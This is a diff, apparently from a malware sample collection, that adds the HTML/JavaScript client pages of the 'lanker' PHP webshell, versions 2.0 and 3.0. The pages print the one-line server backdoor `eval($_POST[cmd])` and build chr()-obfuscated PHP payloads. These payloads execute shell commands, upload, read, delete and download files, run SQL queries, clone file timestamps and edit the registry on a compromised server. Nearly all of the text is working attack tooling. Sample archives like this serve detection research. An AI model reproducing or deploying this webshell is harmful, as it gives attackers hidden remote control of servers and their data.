INPUT {font-size:9pt;BORDER-RIGHT: #cccccc 1px solid; BORDER-TOP: #cccccc 1px solid; BORDER-LEFT: #cccccc 1px solid; COLOR: #666666; BORDER-BOTTOM: #cccccc 1px solid; BACKGROUND-COLOR: #ffffff}
|
||||||
|
textarea {font-size:9pt;BORDER-RIGHT: #cccccc 1px solid; BORDER-TOP: #cccccc 1px solid; BORDER-LEFT: #cccccc 1px solid; COLOR: #666666; BORDER-BOTTOM: #cccccc 1px solid; BACKGROUND-COLOR: #ffffff}
|
||||||
|
select {font-size:9pt;BORDER-RIGHT: #cccccc 1px solid; BORDER-TOP: #cccccc 1px solid; BORDER-LEFT: #cccccc 1px solid; COLOR: #666666; BORDER-BOTTOM: #cccccc 1px solid; BACKGROUND-COLOR: #ffffff}
|
||||||
|
BODY {font-size:9pt; color: #666666;font-family:Verdana; SCROLLBAR-FACE-COLOR: #ffffff; background color:#eeeeee;cursor:SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; SCROLLBAR-SHADOW-COLOR: #aaaaaa; SCROLLBAR-3DLIGHT-COLOR: #aaaaaa; SCROLLBAR-ARROW-COLOR: #dddddd; SCROLLBAR-TRACK-COLOR: #ffffff; SCROLLBAR-DARKSHADOW-COLOR: #ffffff }
|
||||||
|
a:link {text-decoration:none; color:#336699}
|
||||||
|
a:visited {text-decoration:none; color:#336699}
|
||||||
|
a:active {text-decoration:none; color:#336699}
|
||||||
|
a:hover {COLOR: #b4c8d8; }
|
||||||
|
.tb {BORDER-RIGHT: #cccccc 1px solid; BORDER-TOP: #cccccc 1px solid; BORDER-LEFT: #cccccc 1px solid; BORDER-BOTTOM: #cccccc 1px solid;background-color:#cccccc}
|
||||||
|
.tb0 {BORDER-RIGHT: #cccccc 1px solid; BORDER-TOP: #cccccc 1px solid; BORDER-LEFT: #cccccc 1px solid; BORDER-BOTTOM: #cccccc 1px solid;background-color:#fcfcfc}
|
||||||
|
.tb1 {background-color:#ffffff} </style>
|
||||||
|
-->
|
||||||
|
</STYLE>
|
||||||
|
</HEAD>
|
||||||
|
<BODY style="FONT-SIZE: 9pt" bgcolor="#cccccc">
|
||||||
|
<CENTER style="cursor:hand;">
|
||||||
|
<font color="#000080">
|
||||||
|
lanker微型<FONT color=#ff3300>PHP</font>后门客户端2.0正式版</font>
|
||||||
|
</CENTER>
|
||||||
|
<hr size="1" color="#000080">
|
||||||
|
<FORM ENCTYPE="multipart/form-data" name=frm method=post target=qq2>
|
||||||
|
<TABLE style="FONT-SIZE: 9pt">
|
||||||
|
|
||||||
|
<TD width=800 height=10>木马地址: <INPUT
|
||||||
|
style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid"
|
||||||
|
size=85 value=http://127.0.0.1/door.php name=act> 密码: <INPUT
|
||||||
|
style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid"
|
||||||
|
size=20 value=cmd name=para><input type=hidden name='tmpcmd'></TD></TABLE>
|
||||||
|
<TABLE width=750 >
|
||||||
|
<TD bgcolor=#ffffff><TABLE style="FONT-SIZE: 9pt" ><tr width=200 height=10>
|
||||||
|
<select onchange="showDiv(this.value);">
|
||||||
|
<option value="digest" >----基本功能列表----</option>
|
||||||
|
<option value="1" >PHP环境变量</option>
|
||||||
|
<option value="2" >本程序目录</option>
|
||||||
|
<option value="3" >执行CMD命令</option>
|
||||||
|
<option value="6" >读取目录</option>
|
||||||
|
<option value="14" >创建目录</option>
|
||||||
|
<option value="15" >删除目录</option>
|
||||||
|
<option value="4" >上传文件</option>
|
||||||
|
<option value="5" >读取文件</option>
|
||||||
|
<option value="12" >创建文件</option>
|
||||||
|
<option value="7" >复制文件</option>
|
||||||
|
<option value="8" >重命名文件</option>
|
||||||
|
<option value="9" >删除文件</option>
|
||||||
|
<option value="13" >下载文件</option>
|
||||||
|
<option value="11" >执行SQL语句</option>
|
||||||
|
<option value="10" >专家模式(自己写代码)</option>
|
||||||
|
</select></tr><tr height=260><TD id="yunxing" >LANKER微型PHP后门服务端代码:<br><?php eval($_POST[cmd])?><hr size="1" color="#000080"><br>容错代码为:<br><?php @eval($_POST[cmd])?><TD></tr></TABLE></td><td><TABLE style="FONT-SIZE: 9pt"><IFRAME border=1 height=340 width=580 name=qq2 marginwidth=0 marginheight=0 vspace=0
|
||||||
|
src="about:blank"
|
||||||
|
frameborder=no scrolling=auto name=ifff value="fdsadfas"></IFRAME></TABLE></td></table>
|
||||||
|
|
||||||
|
</form>
|
||||||
|
|
||||||
|
<hr size="1" color="#000080">
|
||||||
|
<CENTER>
|
||||||
|
<center><font class=font>PHP soft Web Shell v2.0<br>
|
||||||
|
-------------Code By <FONT color=#ff3300>lanker</font>、<FONT color=#ff3300>孟兄</font> ----------- <br><FONT color=#ff3300>声明:请勿使用本程序从事非法行为,否则后果自负!</font></center>
|
||||||
|
</BODY></HTML>
|
||||||
|
|
||||||
|
|
||||||
|
<script language="javascript">
|
||||||
|
function showDiv(aa){
|
||||||
|
|
||||||
|
switch(aa)
|
||||||
|
{
|
||||||
|
|
||||||
|
case "1":
|
||||||
|
yunxing.innerHTML="PHP环境变量<br>"
|
||||||
|
yunxing.innerHTML+="<p align='center'><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;frm.tmpcmd.value=\"phpinfo();\";frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
|
||||||
|
break;
|
||||||
|
case "2":
|
||||||
|
yunxing.innerHTML="<p align='center'>本程序目录<br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;frm.tmpcmd.value=\"echo dirname(__FILE__);\";frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
|
||||||
|
break;
|
||||||
|
case "3":
|
||||||
|
yunxing.innerHTML="<p align='center'><INPUT size=24 name=\"aaaa\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;cmd();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
|
||||||
|
break;
|
||||||
|
case "4":
|
||||||
|
yunxing.innerHTML="<p align='center'><input NAME='LanKerF' TYPE='file' size=13><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;frm.tmpcmd.value=\"if (copy($_FILES[LanKerF][tmp_name],$_FILES[LanKerF][name])) echo OK;\";frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
|
||||||
|
break;
|
||||||
|
case "5":
|
||||||
|
yunxing.innerHTML="<p align='center'>文件名:<br><INPUT size=24 name=\"duqu\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;readfile();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send> <br><br><br><br><br><br><br><br><br><br>"
|
||||||
|
break;
|
||||||
|
case "6":
|
||||||
|
yunxing.innerHTML="<p align='center'>目录名:<br><INPUT size=24 name=\"duqu\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;readdir();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
|
||||||
|
break;
|
||||||
|
case "7":
|
||||||
|
yunxing.innerHTML="<p align='center'>文件1:<br><INPUT size=24 name=\"file1\"><br>文件2:<br><INPUT size=24 name=\"file2\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;copyfile();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
|
||||||
|
break;
|
||||||
|
case "8":
|
||||||
|
yunxing.innerHTML="<p align='center'>文件1:<br><INPUT size=24 name=\"file1\"><br>文件2:<br><INPUT size=24 name=\"file2\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;renamefile();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
|
||||||
|
break;
|
||||||
|
case "9":
|
||||||
|
yunxing.innerHTML="<p align='center'>文件名:<br><INPUT size=24 name=\"filen\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;delfile();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
|
||||||
|
break;
|
||||||
|
case "10":
|
||||||
|
yunxing.innerHTML="<p align='center'><textarea rows='17' name='duqu' cols='22'>phpinfo();</textarea>"
|
||||||
|
yunxing.innerHTML+="<br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;frm.tmpcmd.value=frm.duqu.value;frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send>"
|
||||||
|
break;
|
||||||
|
case "11":
|
||||||
|
yunxing.innerHTML="主机:<input NAME=\"servername\" TYPE=\"text\" value=\"localhost\" size=\"12\" ><BR>数据库:<input NAME=\"dbname\" TYPE=\"text\" value size=\"10\" > <BR>用户名:<input NAME=\"dbusername\" TYPE=\"text\" value=\"root\" size=\"10\" > <BR>密码:<input NAME=\"dbpassword\" TYPE=\"text\" value size=\"12\" > <BR>SQL语句:<BR><textarea rows=\"8\" name=\"sql\" cols=\"20\" ></textarea>"
|
||||||
|
yunxing.innerHTML+="<br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;SQL();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send>"
|
||||||
|
break;
|
||||||
|
|
||||||
|
|
||||||
|
case "12":
|
||||||
|
yunxing.innerHTML="<p align='center'>文件名:<INPUT size=14 name=\"filen\"><br>文件内容:<BR><textarea rows=\"16\" name=\"filec\" cols=\"20\" >注意:不支持中文字符!</textarea><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;createfile();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
|
||||||
|
break;
|
||||||
|
case "13":
|
||||||
|
yunxing.innerHTML="<p align='center'>文件名:<br><INPUT size=24 name=\"filen\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;downfile();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
|
||||||
|
break;
|
||||||
|
case "14":
|
||||||
|
yunxing.innerHTML="<p align='center'>目录名:<br><INPUT size=24 name=\"dir\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;createdir();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
|
||||||
|
break;
|
||||||
|
case "15":
|
||||||
|
yunxing.innerHTML="<p align='center'>目录名:<br><INPUT size=24 name=\"dir\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;rmdir();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
function cmd(){
|
||||||
|
frm.tmpcmd.value="$cmd="
|
||||||
|
frm.tmpcmd.value+=duqu(frm.aaaa.value)
|
||||||
|
frm.tmpcmd.value+=";\n"
|
||||||
|
frm.tmpcmd.value+="echo chr(60).chr(112).chr(114).chr(101).chr(62);\n"
|
||||||
|
frm.tmpcmd.value+="@system($cmd);\n"
|
||||||
|
frm.tmpcmd.value+="echo chr(60).chr(47).chr(112).chr(114).chr(101).chr(62);\n"
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
function readfile(){
|
||||||
|
frm.tmpcmd.value="$filename="
|
||||||
|
frm.tmpcmd.value+=duqu(frm.duqu.value)
|
||||||
|
frm.tmpcmd.value+=";\n"
|
||||||
|
frm.tmpcmd.value+="$s=chr(60).chr(112).chr(114).chr(101).chr(62);\n"
|
||||||
|
frm.tmpcmd.value+="$e=chr(60).chr(47).chr(112).chr(114).chr(101).chr(62);\n"
|
||||||
|
frm.tmpcmd.value+="$fp=@fopen($filename,r);\n"
|
||||||
|
frm.tmpcmd.value+="$contents=@fread($fp, filesize($filename));\n"
|
||||||
|
frm.tmpcmd.value+="@fclose($fp);\n"
|
||||||
|
frm.tmpcmd.value+="$contents=htmlspecialchars($contents);\n"
|
||||||
|
frm.tmpcmd.value+="echo $s.$contents.$e;\n"
|
||||||
|
}
|
||||||
|
function readdir(){
|
||||||
|
frm.tmpcmd.value="$dir="
|
||||||
|
frm.tmpcmd.value+=duqu(frm.duqu.value)
|
||||||
|
frm.tmpcmd.value+=";\n"
|
||||||
|
frm.tmpcmd.value+="$f = chr(60).chr(98).chr(114).chr(62);"
|
||||||
|
frm.tmpcmd.value+="$dir=@dir($dir);"
|
||||||
|
frm.tmpcmd.value+="if($dir) "
|
||||||
|
frm.tmpcmd.value+="{"
|
||||||
|
frm.tmpcmd.value+=" echo path_______.$dir->path.$f;"
|
||||||
|
frm.tmpcmd.value+=" while($entry=$dir->read())"
|
||||||
|
frm.tmpcmd.value+=" {"
|
||||||
|
frm.tmpcmd.value+=" echo ____.$entry.$f; "
|
||||||
|
frm.tmpcmd.value+=" }"
|
||||||
|
frm.tmpcmd.value+=" $dir->close();"
|
||||||
|
frm.tmpcmd.value+="}"
|
||||||
|
frm.tmpcmd.value+="else"
|
||||||
|
frm.tmpcmd.value+="{echo 0;}"
|
||||||
|
}
|
||||||
|
|
||||||
|
function SQL(){
|
||||||
|
frm.tmpcmd.value="$message=chr(102).chr(97).chr(105).chr(108).chr(33);\n"
|
||||||
|
frm.tmpcmd.value+="$fgf=chr(32);\n"
|
||||||
|
frm.tmpcmd.value+="$servername="
|
||||||
|
frm.tmpcmd.value+=duqu(frm.servername.value)
|
||||||
|
frm.tmpcmd.value+=";\n"
|
||||||
|
frm.tmpcmd.value+="$dbusername="
|
||||||
|
frm.tmpcmd.value+=duqu(frm.dbusername.value)
|
||||||
|
frm.tmpcmd.value+=";\n"
|
||||||
|
frm.tmpcmd.value+="$dbpassword="
|
||||||
|
frm.tmpcmd.value+=duqu(frm.dbpassword.value)
|
||||||
|
frm.tmpcmd.value+=";\n"
|
||||||
|
frm.tmpcmd.value+="$dbname="
|
||||||
|
frm.tmpcmd.value+=duqu(frm.dbname.value)
|
||||||
|
frm.tmpcmd.value+=";\n"
|
||||||
|
frm.tmpcmd.value+="$sql="
|
||||||
|
frm.tmpcmd.value+=duqu(frm.sql.value)
|
||||||
|
frm.tmpcmd.value+=";\n"
|
||||||
|
frm.tmpcmd.value+="@mysql_connect($servername,$dbusername,$dbpassword) or die($message);\n"
|
||||||
|
frm.tmpcmd.value+="@mysql_select_db($dbname) or die($message);\n"
|
||||||
|
frm.tmpcmd.value+="$result = @mysql_query($sql);\n"
|
||||||
|
frm.tmpcmd.value+="if($result){\n"
|
||||||
|
frm.tmpcmd.value+="echo SQL语句成功执行;}\n"
|
||||||
|
frm.tmpcmd.value+="else{echo 失败.mysql_error();}\n"
|
||||||
|
frm.tmpcmd.value+="mysql_close();"
|
||||||
|
}
|
||||||
|
|
||||||
|
function createfile(){
|
||||||
|
|
||||||
|
frm.tmpcmd.value="$filen="
|
||||||
|
frm.tmpcmd.value+=duqu(frm.filen.value)
|
||||||
|
frm.tmpcmd.value+=";\n"
|
||||||
|
frm.tmpcmd.value+="$filec="
|
||||||
|
frm.tmpcmd.value+=duqu(frm.filec.value)
|
||||||
|
frm.tmpcmd.value+=";\n"
|
||||||
|
frm.tmpcmd.value+="$a=chr(119);\n"
|
||||||
|
frm.tmpcmd.value+="$fp=@fopen($filen,$a);\n"
|
||||||
|
frm.tmpcmd.value+="$msg=@fwrite($fp,$filec);\n"
|
||||||
|
frm.tmpcmd.value+="if($msg) echo chr(79).chr(75).chr(33);\n"
|
||||||
|
frm.tmpcmd.value+="@fclose($fp);\n"
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
function copyfile(){
|
||||||
|
frm.tmpcmd.value="$file1="
|
||||||
|
frm.tmpcmd.value+=duqu(frm.file1.value)
|
||||||
|
frm.tmpcmd.value+=";\n"
|
||||||
|
frm.tmpcmd.value+="$file2="
|
||||||
|
frm.tmpcmd.value+=duqu(frm.file2.value)
|
||||||
|
frm.tmpcmd.value+=";\n"
|
||||||
|
frm.tmpcmd.value+="if (@copy($file1,$file2)) echo chr(79).chr(75).chr(33);\n"
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
function renamefile(){
|
||||||
|
|
||||||
|
frm.tmpcmd.value="$file1="
|
||||||
|
frm.tmpcmd.value+=duqu(frm.file1.value)
|
||||||
|
frm.tmpcmd.value+=";\n"
|
||||||
|
frm.tmpcmd.value+="$file2="
|
||||||
|
frm.tmpcmd.value+=duqu(frm.file2.value)
|
||||||
|
frm.tmpcmd.value+=";\n"
|
||||||
|
frm.tmpcmd.value+="if (@rename($file1,$file2)) echo chr(79).chr(75).chr(33);\n"
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
function downfile(){
|
||||||
|
frm.tmpcmd.value="$df="
|
||||||
|
frm.tmpcmd.value+=duqu(frm.filen.value)
|
||||||
|
frm.tmpcmd.value+=";\n"
|
||||||
|
frm.tmpcmd.value+="$f=chr(46);"
|
||||||
|
frm.tmpcmd.value+="$h=chr(67).chr(111).chr(110).chr(116).chr(101).chr(110).chr(116).chr(45).chr(116).chr(121).chr(112).chr(101).chr(58).chr(32).chr(97).chr(112).chr(112).chr(108).chr(105).chr(99).chr(97).chr(116).chr(105).chr(111).chr(110).chr(47).chr(120).chr(45);\n"
|
||||||
|
frm.tmpcmd.value+="$h1=chr(67).chr(111).chr(110).chr(116).chr(101).chr(110).chr(116).chr(45).chr(68).chr(105).chr(115).chr(112).chr(111).chr(115).chr(105).chr(116).chr(105).chr(111).chr(110).chr(58).chr(32).chr(97).chr(116).chr(116).chr(97).chr(99).chr(104).chr(109).chr(101).chr(110).chr(116).chr(59).chr(32).chr(102).chr(105).chr(108).chr(101).chr(110).chr(97).chr(109).chr(101).chr(61);\n"
|
||||||
|
frm.tmpcmd.value+="$h2=(68).chr(101).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(105).chr(111).chr(110).chr(58).chr(32).chr(80).chr(72).chr(80).chr(51).chr(32).chr(71).chr(101).chr(110).chr(101).chr(114).chr(97).chr(116).chr(101).chr(100).chr(32).chr(68).chr(97).chr(116).chr(97);\n"
|
||||||
|
frm.tmpcmd.value+="$fn = basename($df);\n"
|
||||||
|
frm.tmpcmd.value+="$fe = $finfo[count($finfo)-1];\n"
|
||||||
|
frm.tmpcmd.value+="$finfo = explode($f, $fn);\n"
|
||||||
|
frm.tmpcmd.value+="header($h.$fe);\n"
|
||||||
|
frm.tmpcmd.value+="header($h1.$fn);\n"
|
||||||
|
frm.tmpcmd.value+="header($h2);\n"
|
||||||
|
frm.tmpcmd.value+="@readfile($df);\n"
|
||||||
|
frm.tmpcmd.value+="header($h2);\n"
|
||||||
|
frm.tmpcmd.value+="exit;\n"
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
function delfile(){
|
||||||
|
frm.tmpcmd.value="$filen="
|
||||||
|
frm.tmpcmd.value+=duqu(frm.filen.value)
|
||||||
|
frm.tmpcmd.value+=";\n"
|
||||||
|
frm.tmpcmd.value+="if(@unlink($filen)) echo chr(79).chr(75).chr(33);"
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
function createdir(){
|
||||||
|
frm.tmpcmd.value="$dirs="
|
||||||
|
frm.tmpcmd.value+=duqu(frm.dir.value)
|
||||||
|
frm.tmpcmd.value+=";\n"
|
||||||
|
frm.tmpcmd.value+="if(@mkdir($dirs,0777)) echo chr(79).chr(75).chr(33);"
|
||||||
|
}
|
||||||
|
|
||||||
|
function rmdir(){
|
||||||
|
frm.tmpcmd.value="$dirs="
|
||||||
|
frm.tmpcmd.value+=duqu(frm.dir.value)
|
||||||
|
frm.tmpcmd.value+=";\n"
|
||||||
|
frm.tmpcmd.value+="if(@rmdir($dirs)) echo chr(79).chr(75).chr(33);"
|
||||||
|
}
|
||||||
|
function returnc(){
|
||||||
|
alret("document.frm.ifff.value")
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
</script>
|
||||||
|
<script >
|
||||||
|
function duqu(zifu){
|
||||||
|
var duqu="";
|
||||||
|
for(i=1;i<zifu.length;i++){
|
||||||
|
duqu+="chr("+zifu.charCodeAt(i-1)+").";
|
||||||
|
}
|
||||||
|
duqu+="chr("+zifu.charCodeAt(zifu.length-1)+")";
|
||||||
|
return duqu
|
||||||
|
}
|
||||||
|
</script>
|
474
PHP/Backdoor.PHP.Lanker.b
Normal file
474
PHP/Backdoor.PHP.Lanker.b
Normal file
@ -0,0 +1,474 @@
|
|||||||
|
|
||||||
|
<HTML><HEAD>
|
||||||
|
<!-- codz by LANKER(QQ:18779569) 2005/1/1-->
|
||||||
|
<META content="text/html; charset=gb2312" http-equiv=Content-Type>
|
||||||
|
<META content="MSHTML 5.00.2614.3500" name=GENERATOR>
|
||||||
|
<style>
|
||||||
|
<!--
|
||||||
|
td {font-size:8pt; color: #666666;font-family:Verdana}
|
||||||
|
INPUT {font-size:9pt;BORDER-RIGHT: #cccccc 1px solid; BORDER-TOP: #cccccc 1px solid; BORDER-LEFT: #cccccc 1px solid; COLOR: #666666; BORDER-BOTTOM: #cccccc 1px solid; BACKGROUND-COLOR: #ffffff}
|
||||||
|
textarea {font-size:9pt;BORDER-RIGHT: #cccccc 1px solid; BORDER-TOP: #cccccc 1px solid; BORDER-LEFT: #cccccc 1px solid; COLOR: #666666; BORDER-BOTTOM: #cccccc 1px solid; BACKGROUND-COLOR: #ffffff}
|
||||||
|
select {font-size:9pt;BORDER-RIGHT: #cccccc 1px solid; BORDER-TOP: #cccccc 1px solid; BORDER-LEFT: #cccccc 1px solid; COLOR: #666666; BORDER-BOTTOM: #cccccc 1px solid; BACKGROUND-COLOR: #ffffff}
|
||||||
|
BODY {font-size:9pt; color: #666666;font-family:Verdana; SCROLLBAR-FACE-COLOR: #ffffff; background color:#eeeeee;cursor:SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; SCROLLBAR-SHADOW-COLOR: #aaaaaa; SCROLLBAR-3DLIGHT-COLOR: #aaaaaa; SCROLLBAR-ARROW-COLOR: #dddddd; SCROLLBAR-TRACK-COLOR: #ffffff; SCROLLBAR-DARKSHADOW-COLOR: #ffffff }
|
||||||
|
a:link {text-decoration:none; color:#336699}
|
||||||
|
a:visited {text-decoration:none; color:#336699}
|
||||||
|
a:active {text-decoration:none; color:#336699}
|
||||||
|
a:hover {COLOR: #b4c8d8; }
|
||||||
|
.tb {BORDER-RIGHT: #cccccc 1px solid; BORDER-TOP: #cccccc 1px solid; BORDER-LEFT: #cccccc 1px solid; BORDER-BOTTOM: #cccccc 1px solid;background-color:#cccccc}
|
||||||
|
.tb0 {BORDER-RIGHT: #cccccc 1px solid; BORDER-TOP: #cccccc 1px solid; BORDER-LEFT: #cccccc 1px solid; BORDER-BOTTOM: #cccccc 1px solid;background-color:#fcfcfc}
|
||||||
|
.tb1 {background-color:#ffffff} </style>
|
||||||
|
-->
|
||||||
|
</STYLE>
|
||||||
|
</HEAD>
|
||||||
|
<BODY style="FONT-SIZE: 9pt" bgcolor="#cccccc">
|
||||||
|
<CENTER style="cursor:hand;">
|
||||||
|
<font color="#000080">
|
||||||
|
lanker一句话PHP后门客户端3.0</font><FONT color=#ff3300>内部版</font>
|
||||||
|
</CENTER>
|
||||||
|
<hr size="1" color="#000080">
|
||||||
|
<FORM ENCTYPE="multipart/form-data" name=frm method=post target=qq2>
|
||||||
|
<TABLE style="FONT-SIZE: 9pt">
|
||||||
|
<TD width=750 height=10>后门地址: <INPUT
|
||||||
|
style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid"
|
||||||
|
size=60 value=http://127.0.0.1/door.php name=act> 密码: <INPUT 后门
|
||||||
|
style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid"
|
||||||
|
size=10 value=cmd name=para>生成器:<textarea rows='1' name='tmpcmd' cols='23'><?php eval($_POST[cmd]?;></textarea></TD></TABLE>
|
||||||
|
<TABLE width=750 >
|
||||||
|
<TD bgcolor=#ffffff><TABLE style="FONT-SIZE: 9pt" ><tr width=200 height=10>
|
||||||
|
<select onchange="showDiv(this.value);">
|
||||||
|
<option value="digest" >----基本功能列表----</option>
|
||||||
|
<option value="2" >PHP环境变量</option>
|
||||||
|
<option value="16" >服务器基本信息</option>
|
||||||
|
<option value="1" >本程序目录</option>
|
||||||
|
<option value="3" >执行CMD命令</option>
|
||||||
|
<option value="17" >无回显CMD命令</option>
|
||||||
|
<option value="6" >读取目录</option>
|
||||||
|
<option value="14" >创建目录</option>
|
||||||
|
<option value="15" >删除目录</option>
|
||||||
|
<option value="4" >上传文件</option>
|
||||||
|
<option value="5" >读取文件</option>
|
||||||
|
<option value="12" >创建文件</option>
|
||||||
|
<option value="7" >复制文件</option>
|
||||||
|
<option value="8" >重命名文件</option>
|
||||||
|
<option value="9" >删除文件</option>
|
||||||
|
<option value="13" >下载文件</option>
|
||||||
|
<option value="21" >克隆文件时间</option>
|
||||||
|
<option value="22" >在线代理</option>
|
||||||
|
<option value="11" >执行SQL语句</option>
|
||||||
|
<option value="18" >读取注册表</option>
|
||||||
|
<option value="19" >写入注册表</option>
|
||||||
|
<option value="20" >删除注册表</option>
|
||||||
|
<option value="10" >专家模式(自己写代码)</option>
|
||||||
|
</select></tr><tr height=260><TD id="yunxing" ><FONT color=#ff3300>LANKER微型PHP后门服务端代码:<br><?php eval($_POST[cmd])?><hr size="1" color="#000080"><br>容错代码为:<br><?php @eval($_POST[cmd])?></font><TD></tr></TABLE></td><td><TABLE style="FONT-SIZE: 9pt"><IFRAME border=1 height=340 width=580 name=qq2 marginwidth=0 marginheight=0 vspace=0
|
||||||
|
src="about:blank"
|
||||||
|
frameborder=no scrolling=auto></IFRAME></TABLE></td></table>
|
||||||
|
</form>
|
||||||
|
|
||||||
|
<hr size="1" color="#000000">
|
||||||
|
<CENTER>
|
||||||
|
<center>
|
||||||
|
<FONT color=#ff3300>声明:此版为内部版,未经授权允许严禁传给他人和提供公开下载!谢谢合作!By lanker</font></center>
|
||||||
|
</BODY></HTML>
|
||||||
|
<script language="javascript">
|
||||||
|
function showDiv(aa){
|
||||||
|
|
||||||
|
switch(aa)
|
||||||
|
{
|
||||||
|
|
||||||
|
case "2":
|
||||||
|
yunxing.innerHTML="<p align='center'>本程序目录<br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;frm.tmpcmd.value=\"echo dirname(__FILE__);\";frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
|
||||||
|
break;
|
||||||
|
case "1":
|
||||||
|
yunxing.innerHTML="PHP环境变量<br>"
|
||||||
|
yunxing.innerHTML+="<p align='center'><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;frm.tmpcmd.value=\"phpinfo();\";frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
|
||||||
|
break;
|
||||||
|
|
||||||
|
case "3":
|
||||||
|
yunxing.innerHTML="<p align='center'>执行函数:<br><select name='execfun'><option value='system' selected>system</option><option value='syscom'>调用COM对象(适用WINNT)</option><option value='passthru'>passthru</option><option value='`'>反引号(`)</option><option value='shell_exec'>shell_exec</option><option value='exec'>exec</option><option value='popen'>popen</option></select><br><br>命令:<br><INPUT size=24 name=\"cmdname\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;cmd();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
|
||||||
|
break;
|
||||||
|
case "4":
|
||||||
|
yunxing.innerHTML="文件路径(不填为当前目录)<br><input type=text name='uploaddir' value='c:/lanker' size=24><p align='center'><input NAME='LanKerF' TYPE='file' size=13><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;upfile();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
|
||||||
|
break;
|
||||||
|
case "5":
|
||||||
|
yunxing.innerHTML="<p align='center'>文件名:<br><INPUT size=24 name=\"duqu\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;readfile();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
|
||||||
|
break;
|
||||||
|
case "6":
|
||||||
|
